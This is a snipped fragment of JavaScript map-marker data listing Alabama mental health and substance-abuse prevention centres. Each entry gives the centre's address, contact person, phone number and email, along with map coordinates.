holism Recovery Services\x3c/b\x3e\x3cbr\x3e2101 Daniel Payne Drive\x3cbr\x3eBirmingham, AL 35214\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFred Armstead\x3cbr\x3e205-791-2042\x3cbr\x3e\x3ca href=\"mailto:armsteadph@aol.com\" target=\"_blank\"\x3earmsteadph@aol.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.571527,-86.895124\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"C",fid:"g6d533f
...[SNIP]...
ription:"\x3cb\x3eAletheia House\x3c/b\x3e\x3cbr\x3e201 Finley Avenue\x3cbr\x3eBirmingham, AL 35204\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eChris Retan\x3cbr\x3e205-324-6502\x3cbr\x3e\x3ca href=\"mailto:gloriamhoward@yahoo.com\" target=\"_blank\"\x3egloriamhoward@yahoo.com\x3c/a\x3e",infoWindow:{title:"Aletheia House",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Aletheia House201 Finley AvenueBirmingham, AL 35204Contact:Chris Retan205-324-6",dscr:"\x3cb\x3eAletheia House\x3c/b\x3e\x3cbr\x3e201 Finley Avenue\x3cbr\x3eBirmingham, AL 35204\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eChris Retan\x3cbr\x3e205-324-6502\x3cbr\x3e\x3ca href=\"mailto:gloriamhoward@yahoo.com\" target=\"_blank\"\x3egloriamhoward@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.522151,-86.839681\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"D",fid:"g1e0048
...[SNIP]...
County Mental Health Center\x3c/b\x3e\x3cbr\x3e372 South Greeno Road\x3cbr\x3eFairhope, AL 36532\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRobin Riggins\x3cbr\x3e251-990-4233\x3cbr\x3e\x3ca href=\"mailto:Rdm-bcmhc@yahoo.com\" target=\"_blank\"\x3eRdm-bcmhc@yahoo.com\x3c/a\x3e",infoWindow:{title:"Baldwin County Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Baldwin County Mental Health Center372 South Greeno RoadFairhope, AL 365
...[SNIP]...
County Mental Health Center\x3c/b\x3e\x3cbr\x3e372 South Greeno Road\x3cbr\x3eFairhope, AL 36532\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRobin Riggins\x3cbr\x3e251-990-4233\x3cbr\x3e\x3ca href=\"mailto:Rdm-bcmhc@yahoo.com\" target=\"_blank\"\x3eRdm-bcmhc@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.479949,-87.862289\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"E",fid:"gcf9d21
...[SNIP]...
"\x3cb\x3eCahaba Center for Mental Health\x3c/b\x3e\x3cbr\x3e912 Jeff Davis\x3cbr\x3eSelma, AL 36701\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3ePat Martin\x3cbr\x3e334-874-2600\x3cbr\x3e\x3ca href=\"mailto:ccpreven@bellsouth.net\" target=\"_blank\"\x3eccpreven@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Cahaba Center for Mental Health",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cahaba Center for Mental Health912 Jeff DavisSelma, AL 36701Contact:Pat Mart
...[SNIP]...
"\x3cb\x3eCahaba Center for Mental Health\x3c/b\x3e\x3cbr\x3e912 Jeff Davis\x3cbr\x3eSelma, AL 36701\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3ePat Martin\x3cbr\x3e334-874-2600\x3cbr\x3e\x3ca href=\"mailto:ccpreven@bellsouth.net\" target=\"_blank\"\x3eccpreven@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.440385,-87.023360\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"F",fid:"g68fe28
...[SNIP]...
\x3cb\x3eCED Mental Health Center\x3c/b\x3e\x3cbr\x3e901 Goodyear Avenue\x3cbr\x3eGadsden, AL 35903\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFran Lopomo\x3cbr\x3e256-492-7800\x3cbr\x3e\x3ca href=\"mailto:cedmhc@bellsouth.net\" target=\"_blank\"\x3ecedmhc@bellsouth.net\x3c/a\x3e",infoWindow:{title:"CED Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"CED Mental Health Center901 Goodyear AvenueGadsden, AL 35903Contact:Fran Lopomo",ds
...[SNIP]...
\x3cb\x3eCED Mental Health Center\x3c/b\x3e\x3cbr\x3e901 Goodyear Avenue\x3cbr\x3eGadsden, AL 35903\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFran Lopomo\x3cbr\x3e256-492-7800\x3cbr\x3e\x3ca href=\"mailto:cedmhc@bellsouth.net\" target=\"_blank\"\x3ecedmhc@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.027852,-85.858543\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"G",fid:"gdf4bcf
...[SNIP]...
ha Mental Health Center\x3c/b\x3e\x3cbr\x3e1721 Old Birmingham Highway\x3cbr\x3eSylacauga, AL 35150\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGary Garner\x3cbr\x3e256-245-2201\x3cbr\x3e\x3ca href=\"mailto:ggarner@cheahamentalhealth.com\" target=\"_blank\"\x3eggarner@cheahamentalhealth.com\x3c/a\x3e",infoWindow:{title:"Cheaha Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cheaha Mental Health Center1721 Old Birmingham HighwaySylacauga, AL 35150Contac"
...[SNIP]...
ha Mental Health Center\x3c/b\x3e\x3cbr\x3e1721 Old Birmingham Highway\x3cbr\x3eSylacauga, AL 35150\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGary Garner\x3cbr\x3e256-245-2201\x3cbr\x3e\x3ca href=\"mailto:ggarner@cheahamentalhealth.com\" target=\"_blank\"\x3eggarner@cheahamentalhealth.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.191619,-86.229870\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"H",fid:"g7bb607
...[SNIP]...
ouncil\x3c/b\x3e\x3cbr\x3e1460 West Main Street\x3cbr\x3eA, Room 102\x3cbr\x3eCentre, AL 35960\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnne-Marie Jones\x3cbr\x3e256-927-7102\x3cbr\x3e\x3ca href=\"mailto:asac@tds.net\" target=\"_blank\"\x3easac@tds.net\x3c/a\x3e",infoWindow:{title:"Cherokee C. Alcoholism/Substance Abuse Council",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cherokee C. Alcoholism/Substance Abuse Council1460 West Main S
...[SNIP]...
ouncil\x3c/b\x3e\x3cbr\x3e1460 West Main Street\x3cbr\x3eA, Room 102\x3cbr\x3eCentre, AL 35960\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnne-Marie Jones\x3cbr\x3e256-927-7102\x3cbr\x3e\x3ca href=\"mailto:asac@tds.net\" target=\"_blank\"\x3easac@tds.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.128595,-85.576367\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"I",fid:"gfc78e6
...[SNIP]...
Center (SA)\x3c/b\x3e\x3cbr\x3e3156 Pelham Parkway\x3cbr\x3eSuite 4\x3cbr\x3ePelham, AL 35124\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMelodie Crawford\x3cbr\x3e205-685-9535\x3cbr\x3e\x3ca href=\"mailto:csmhc@bellsouth.net\" target=\"_blank\"\x3ecsmhc@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Chilton/Shelby Mental Health Center (SA)",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Chilton/Shelby Mental Health Center (SA)3156 Pelham ParkwaySuite 4Pe
...[SNIP]...
Center (SA)\x3c/b\x3e\x3cbr\x3e3156 Pelham Parkway\x3cbr\x3eSuite 4\x3cbr\x3ePelham, AL 35124\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMelodie Crawford\x3cbr\x3e205-685-9535\x3cbr\x3e\x3ca href=\"mailto:csmhc@bellsouth.net\" target=\"_blank\"\x3ecsmhc@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.307028,-86.776474\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"J",fid:"g5ecc07
...[SNIP]...
ouncil on Substance Abuse/NCADD\x3c/b\x3e\x3cbr\x3e828 Forest Avenue\x3cbr\x3eMontgomery, AL 36106\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAlice Murphy\x3cbr\x3e334-262-1629\x3cbr\x3e\x3ca href=\"mailto:csancadd@bellsouth.net\" target=\"_blank\"\x3ecsancadd@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Council on Substance Abuse/NCADD",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Council on Substance Abuse/NCADD828 Forest AvenueMontgomery, AL 36106Contac
...[SNIP]...
ouncil on Substance Abuse/NCADD\x3c/b\x3e\x3cbr\x3e828 Forest Avenue\x3cbr\x3eMontgomery, AL 36106\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAlice Murphy\x3cbr\x3e334-262-1629\x3cbr\x3e\x3ca href=\"mailto:csancadd@bellsouth.net\" target=\"_blank\"\x3ecsancadd@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.352916,-86.258408\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"K",fid:"g92f987
...[SNIP]...
ullman Area Mental Health Center\x3c/b\x3e\x3cbr\x3e1909 Commerce Ave\x3cbr\x3eCullman, AL 35056\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eChris Van Dyke\x3cbr\x3e256-734-4688\x3cbr\x3e\x3ca href=\"mailto:cvandyke@camha.com\" target=\"_blank\"\x3ecvandyke@camha.com\x3c/a\x3e",infoWindow:{title:"Cullman Area Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cullman Area Mental Health Center1909 Commerce AveCullman, AL 35056Contact
...[SNIP]...
ullman Area Mental Health Center\x3c/b\x3e\x3cbr\x3e1909 Commerce Ave\x3cbr\x3eCullman, AL 35056\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eChris Van Dyke\x3cbr\x3e256-734-4688\x3cbr\x3e\x3ca href=\"mailto:cvandyke@camha.com\" target=\"_blank\"\x3ecvandyke@camha.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.178558,-86.840896\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"L",fid:"g0eb0cd
...[SNIP]...
3eDrug Education Council, Inc.\x3c/b\x3e\x3cbr\x3e3000 Television Avenue\x3cbr\x3eMobile, AL 36606\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eVirginia Guy\x3cbr\x3e251-478-7855\x3cbr\x3e\x3ca href=\"mailto:vguy@drugeducation.org\" target=\"_blank\"\x3evguy@drugeducation.org\x3c/a\x3e",infoWindow:{title:"Drug Education Council, Inc.",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Drug Education Council, Inc.3000 Television AvenueMobile, AL 36606Contact:Virgi
...[SNIP]...
3eDrug Education Council, Inc.\x3c/b\x3e\x3cbr\x3e3000 Television Avenue\x3cbr\x3eMobile, AL 36606\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eVirginia Guy\x3cbr\x3e251-478-7855\x3cbr\x3e\x3ca href=\"mailto:vguy@drugeducation.org\" target=\"_blank\"\x3evguy@drugeducation.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.670087,-88.105750\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"M",fid:"gb3ae93
...[SNIP]...
alth Center\x3c/b\x3e\x3cbr\x3e2300 Center Hills Drive,\x3cbr\x3eBldg. 2\x3cbr\x3eOpelika, AL 36801\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnne Penney\x3cbr\x3e334-742-2112\x3cbr\x3e\x3ca href=\"mailto:jeanspicer@earthlink.net\" target=\"_blank\"\x3ejeanspicer@earthlink.net\x3c/a\x3e",infoWindow:{title:"East Alabama Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"East Alabama Mental Health Center2300 Center Hills Drive,Bldg. 2Opelika, AL
...[SNIP]...
alth Center\x3c/b\x3e\x3cbr\x3e2300 Center Hills Drive,\x3cbr\x3eBldg. 2\x3cbr\x3eOpelika, AL 36801\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnne Penney\x3cbr\x3e334-742-2112\x3cbr\x3e\x3ca href=\"mailto:jeanspicer@earthlink.net\" target=\"_blank\"\x3ejeanspicer@earthlink.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.691136,-85.400067\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"N",fid:"g4d9560
...[SNIP]...
Central Alabama Mental Health Center\x3c/b\x3e\x3cbr\x3e200 Cherry Street\x3cbr\x3eTroy, AL 36081\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDon Schofield\x3cbr\x3e334-566-6022\x3cbr\x3e\x3ca href=\"mailto:ecmh310@trojan.troyst.edu\" target=\"_blank\"\x3eecmh310@trojan.troyst.edu\x3c/a\x3e",infoWindow:{title:"East Central Alabama Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"East Central Alabama Mental Health Center200 Cherry StreetTroy, AL
...[SNIP]...
Central Alabama Mental Health Center\x3c/b\x3e\x3cbr\x3e200 Cherry Street\x3cbr\x3eTroy, AL 36081\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDon Schofield\x3cbr\x3e334-566-6022\x3cbr\x3e\x3ca href=\"mailto:ecmh310@trojan.troyst.edu\" target=\"_blank\"\x3eecmh310@trojan.troyst.edu\x3c/a\x3e",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"O",fid:"g07055ad3bdfb5c17",latlng:{lat:30.682303000000001,lng:-88.068275},image:"http://www.alabama.gov/images/mapMarkers/MENTAL_HEALTH_ico
...[SNIP]...
n Primary Health Center, Inc.\x3c/b\x3e\x3cbr\x3e1303 Dr. MLK, Jr. Ave.\x3cbr\x3eMobile, AL 36604\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCharles White\x3cbr\x3e251-434-8195\x3cbr\x3e\x3ca href=\"mailto:cwhite832@aol.com\" target=\"_blank\"\x3ecwhite832@aol.com\x3c/a\x3e",infoWindow:{title:"Franklin Primary Health Center, Inc.",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Franklin Primary Health Center, Inc.1303 Dr. MLK, Jr. Ave.Mobile, AL 36
...[SNIP]...
n Primary Health Center, Inc.\x3c/b\x3e\x3cbr\x3e1303 Dr. MLK, Jr. Ave.\x3cbr\x3eMobile, AL 36604\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCharles White\x3cbr\x3e251-434-8195\x3cbr\x3e\x3ca href=\"mailto:cwhite832@aol.com\" target=\"_blank\"\x3ecwhite832@aol.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.682303,-88.068275\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"P",fid:"g03869f
...[SNIP]...
,description:"\x3cb\x3eGateway\x3c/b\x3e\x3cbr\x3e1401 South 20th Street\x3cbr\x3eBirmingham, AL 35205\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Loop\x3cbr\x3e205-510-2777\x3cbr\x3e\x3ca href=\"mailto:jloop@gway.org\" target=\"_blank\"\x3ejloop@gway.org\x3c/a\x3e",infoWindow:{title:"Gateway",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Gateway1401 South 20th StreetBirmingham, AL 35205Contact:Jim Loop205-510-2777jl",dscr:"\x3cb\x3eGateway\x3c/b\x3e\x3cbr\x3e1401 South 20th Street\x3cbr\x3eBirmingham, AL 35205\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Loop\x3cbr\x3e205-510-2777\x3cbr\x3e\x3ca href=\"mailto:jloop@gway.org\" target=\"_blank\"\x3ejloop@gway.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.495219,-86.806914\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Q",fid:"g10cd91
...[SNIP]...
h Center/Insight Center, Main Office\x3c/b\x3e\x3cbr\x3e1914 7th Street\x3cbr\x3eTuscaloosa, AL 35403\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Moore\x3cbr\x3e205-391-0132\x3cbr\x3e\x3ca href=\"mailto:jmoore@irmhc.org\" target=\"_blank\"\x3ejmoore@irmhc.org\x3c/a\x3e",infoWindow:{title:"Indian Rivers Mental Health Center/Insight Center, Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Indian Rivers Mental Health Center/Insight Cen
...[SNIP]...
h Center/Insight Center, Main Office\x3c/b\x3e\x3cbr\x3e1914 7th Street\x3cbr\x3eTuscaloosa, AL 35403\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Moore\x3cbr\x3e205-391-0132\x3cbr\x3e\x3ca href=\"mailto:jmoore@irmhc.org\" target=\"_blank\"\x3ejmoore@irmhc.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.203063,-87.562315\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"R",fid:"gdad9d0
...[SNIP]...
/Insight Center, Prevention Office\x3c/b\x3e\x3cbr\x3e3532 23rd Street\x3cbr\x3eTuscaloosa, AL 35403\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eIris Davis\x3cbr\x3e205-391-0132\x3cbr\x3e\x3ca href=\"mailto:mprice@irmhc.org\" target=\"_blank\"\x3emprice@irmhc.org\x3c/a\x3e",infoWindow:{title:"Indian Rivers Mental Health Center/Insight Center, Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Indian Rivers Mental Health Center/Insig
...[SNIP]...
/Insight Center, Prevention Office\x3c/b\x3e\x3cbr\x3e3532 23rd Street\x3cbr\x3eTuscaloosa, AL 35403\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eIris Davis\x3cbr\x3e205-391-0132\x3cbr\x3e\x3ca href=\"mailto:mprice@irmhc.org\" target=\"_blank\"\x3emprice@irmhc.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.203063,-87.562315\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"S",fid:"g551278
...[SNIP]...
x3c/b\x3e\x3cbr\x3e4040 South Memorial Parkway\x3cbr\x3eSuite C\x3cbr\x3eHuntsville, AL 35802\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBrian Davis, LCSW\x3cbr\x3e256-705-6454\x3cbr\x3e\x3ca href=\"mailto:brian.davis@mhcme.org\" target=\"_blank\"\x3ebrian.davis@mhcme.org\x3c/a\x3e",infoWindow:{title:"Mental Health Center of Madison County, Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mental Health Center of Madison County, Main Office4040 S
...[SNIP]...
x3c/b\x3e\x3cbr\x3e4040 South Memorial Parkway\x3cbr\x3eSuite C\x3cbr\x3eHuntsville, AL 35802\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBrian Davis, LCSW\x3cbr\x3e256-705-6454\x3cbr\x3e\x3ca href=\"mailto:brian.davis@mhcme.org\" target=\"_blank\"\x3ebrian.davis@mhcme.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.667190,-86.558914\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"T",fid:"g35bc58
...[SNIP]...
ice\x3c/b\x3e\x3cbr\x3e4041 South Memorial Parkway\x3cbr\x3eSuite D\x3cbr\x3eHuntsville, AL 35802\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRita Limbaugh\x3cbr\x3e256-705-6454\x3cbr\x3e\x3ca href=\"mailto:rita.limbaugh@mheme.org\" target=\"_blank\"\x3erita.limbaugh@mheme.org\x3c/a\x3e",infoWindow:{title:"Mental Health Center of Madison County, Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mental Health Center of Madison County, Prevention
...[SNIP]...
ice\x3c/b\x3e\x3cbr\x3e4041 South Memorial Parkway\x3cbr\x3eSuite D\x3cbr\x3eHuntsville, AL 35802\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRita Limbaugh\x3cbr\x3e256-705-6454\x3cbr\x3e\x3ca href=\"mailto:rita.limbaugh@mheme.org\" target=\"_blank\"\x3erita.limbaugh@mheme.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.667190,-86.558914\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"U",fid:"g8010c1
...[SNIP]...
or Economic Opportunity\x3c/b\x3e\x3cbr\x3e228 2nd Avenue North\x3cbr\x3eBirmingham, AL 35204\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLynneice Williams\x3cbr\x3e205-787-3040\x3cbr\x3e\x3ca href=\"mailto:lynwilliams@jcceo.org\" target=\"_blank\"\x3elynwilliams@jcceo.org\x3c/a\x3e",infoWindow:{title:"Jefferson County Committee for Economic Opportunity",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Jefferson County Committee for Economic Opportunity228 2n
...[SNIP]...
or Economic Opportunity\x3c/b\x3e\x3cbr\x3e228 2nd Avenue North\x3cbr\x3eBirmingham, AL 35204\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLynneice Williams\x3cbr\x3e205-787-3040\x3cbr\x3e\x3ca href=\"mailto:lynwilliams@jcceo.org\" target=\"_blank\"\x3elynwilliams@jcceo.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.522151,-86.839681\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"V",fid:"g226b72
...[SNIP]...
Counseling Center, Inc.\x3c/b\x3e\x3cbr\x3e1415 East South Boulevard\x3cbr\x3eMontgomery, AL 36116\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDoug Lindley\x3cbr\x3e334-286-5980\x3cbr\x3e\x3ca href=\"mailto:dlindley@lighthousehelp.com\" target=\"_blank\"\x3edlindley@lighthousehelp.com\x3c/a\x3e",infoWindow:{title:"Lighthouse Counseling Center, Inc.",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lighthouse Counseling Center, Inc.1415 East South BoulevardMontgomery, AL
...[SNIP]...
Counseling Center, Inc.\x3c/b\x3e\x3cbr\x3e1415 East South Boulevard\x3cbr\x3eMontgomery, AL 36116\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDoug Lindley\x3cbr\x3e334-286-5980\x3cbr\x3e\x3ca href=\"mailto:dlindley@lighthousehelp.com\" target=\"_blank\"\x3edlindley@lighthousehelp.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.264761,-86.200796\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"W",fid:"g03af03
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e1241 O?Brig Avenue\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJerome Johnson\x3cbr\x3e256-582-4240\x3cbr\x3e\x3ca href=\"mailto:jjohnson@mlbhc.com\" target=\"_blank\"\x3ejjohnson@mlbhc.com\x3c/a\x3e",infoWindow:{title:"Marshall-Jackson Mental Health Center, Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Marshall-Jackson Mental Health Center, Main Office1241 O?B
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e1241 O?Brig Avenue\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJerome Johnson\x3cbr\x3e256-582-4240\x3cbr\x3e\x3ca href=\"mailto:jjohnson@mlbhc.com\" target=\"_blank\"\x3ejjohnson@mlbhc.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.309673,-86.401007\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"X",fid:"g156ff1
...[SNIP]...
nter, Prevention Office\x3c/b\x3e\x3cbr\x3e2409 Homer Clayton Drive\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAlex Farish\x3cbr\x3e256-582-3204\x3cbr\x3e\x3ca href=\"mailto:afarish@mlbhc.com\" target=\"_blank\"\x3eafarish@mlbhc.com\x3c/a\x3e",infoWindow:{title:"Marshall-Jackson Mental Health Center, Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Marshall-Jackson Mental Health Center, Prevention Of
...[SNIP]...
nter, Prevention Office\x3c/b\x3e\x3cbr\x3e2409 Homer Clayton Drive\x3cbr\x3eGuntersville, AL 35976\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAlex Farish\x3cbr\x3e256-582-3204\x3cbr\x3e\x3ca href=\"mailto:afarish@mlbhc.com\" target=\"_blank\"\x3eafarish@mlbhc.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.309673,-86.401007\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Y",fid:"gb4d34a
...[SNIP]...
), Main Office\x3c/b\x3e\x3cbr\x3e1316 Somerville Rd. SE\x3cbr\x3eSuite 1\x3cbr\x3eDecatur, AL 35601\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMarie Hood\x3cbr\x3e256-355-6901\x3cbr\x3e\x3ca href=\"mailto:mhood@mhcnca.org\" target=\"_blank\"\x3emhood@mhcnca.org\x3c/a\x3e",infoWindow:{title:"Mental Health Center of North Central Alabama (Quest), Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mental Health Center of North Central Alab
...[SNIP]...
), Main Office\x3c/b\x3e\x3cbr\x3e1316 Somerville Rd. SE\x3cbr\x3eSuite 1\x3cbr\x3eDecatur, AL 35601\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMarie Hood\x3cbr\x3e256-355-6901\x3cbr\x3e\x3ca href=\"mailto:mhood@mhcnca.org\" target=\"_blank\"\x3emhood@mhcnca.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.605442,-87.013500\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Z",fid:"gae4024
...[SNIP]...
